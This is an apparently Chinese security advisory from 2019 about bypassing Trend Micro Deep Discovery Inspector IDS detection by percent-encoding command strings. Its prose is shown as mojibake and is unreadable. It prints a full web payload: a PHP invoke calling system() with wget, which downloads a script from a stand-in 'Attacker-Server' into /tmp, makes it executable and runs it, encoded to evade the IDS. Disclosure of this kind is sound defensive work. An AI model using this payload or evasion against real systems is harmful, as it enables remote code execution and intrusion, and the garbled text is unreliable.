Trend Micro Deep Discovery Inspector IDS°²È«Èƹý·ì϶°²È«¹«¸æ

°ä²¼¹¦·ò 2019-07-26

·ì϶±àºÅºÍ¼¶±ð


CVE±àºÅ£ºÔÝÎÞ£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


ÊÜÓ°ÏìµÄ°æ±¾


Trend Micro Deep Discovery Inspector IDS


·ì϶¸ÅÊö


Trend Micro Deep Discovery Inspector IDS ÊÇÒ»ÖÖÍøÂçÉ豸£¬¿É¼à¿ØËùÓÐÀàÐͺͳ¬¹ý105ÖÖ·ÖÆçµÄÍøÂçºÍ̸£¬ÒÔ·¢ÏÖ½ø³öÍøÂçµÄ¸ß¼¶ÍþвºÍÓÐÕë¶ÔÐԵĹ¥»÷¡£2019Äê7ÔÂ24ÈÕ£¬×êÑÐÈËÔ±Åû¶ÁËTrend Micro Deep Discovery Inspector IDS °²È«Èƹý·ì϶µÄÏêÇé¡£°²È«Èƹý·ì϶ԴÓÚÍøÂçϵͳ»ò²úÆ·ÖжÌȱÄÚÈÝÑéÖ¤¹æ¶¨»ò¶ÔÄÚÈÝÑé֤ǿ¶È²»¼°¡£


·ì϶ÑéÖ¤


¾­¹ý¶ÈÎö£¬IDS·¢ÏÖ¶ñÒâϵͳºÅÁÈç¡°Wget  Commandline  Injection¡±£©»á·¢³ö¾¯±¨£¬²¢ÇÒ½«ËüÃÇÏóÕ÷Ϊ¸ß·çÏÕ¡£¹¥»÷Õß½«payloadÓëͨ³£µÄascii×Ö·ûһ··¢ËÍ£¬ÀýÈç¡°wget¡±£¬¼´±ãËüÃǽøÐÐÁËÈç¡°\ x77 \ x67 \ x65 \ x74¡±µÄ±àÂ룬ÈԻᷢ³ö¾¯±¨¡£µ«ÊÇ£¬¹¥»÷ÕßÄܹ»Í¨¹ýÔÚHEXÖÐÒÔ°Ù·ÖºÅ×Ö·û¡°£¥¡±¿ªÍ·µÄ¶ñÒâºÅÁîÀ´ÇáËÉÈƹýÕâЩ¾¯±¨£¬ÀýÈ磬¡°£¥77£¥ 67£¥65£¥74¡±Ò²×ª»»Îª¡°wget¡±£¬²»½ö²»»á±»ÏóÕ÷»òÖҸ棬ҲÄܹ»ÔÚÖ¸±êϵͳÉÏÖ´ÐС£


Payload£º


/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&v ars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O% 20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a


½¨¸´½¨Òé


¹Ø×¢¹Ù·½ÍøÕ¾£¬ÊµÊ±ÏÂÔز¹¶¡¸üС£


²Î¿¼Á´½Ó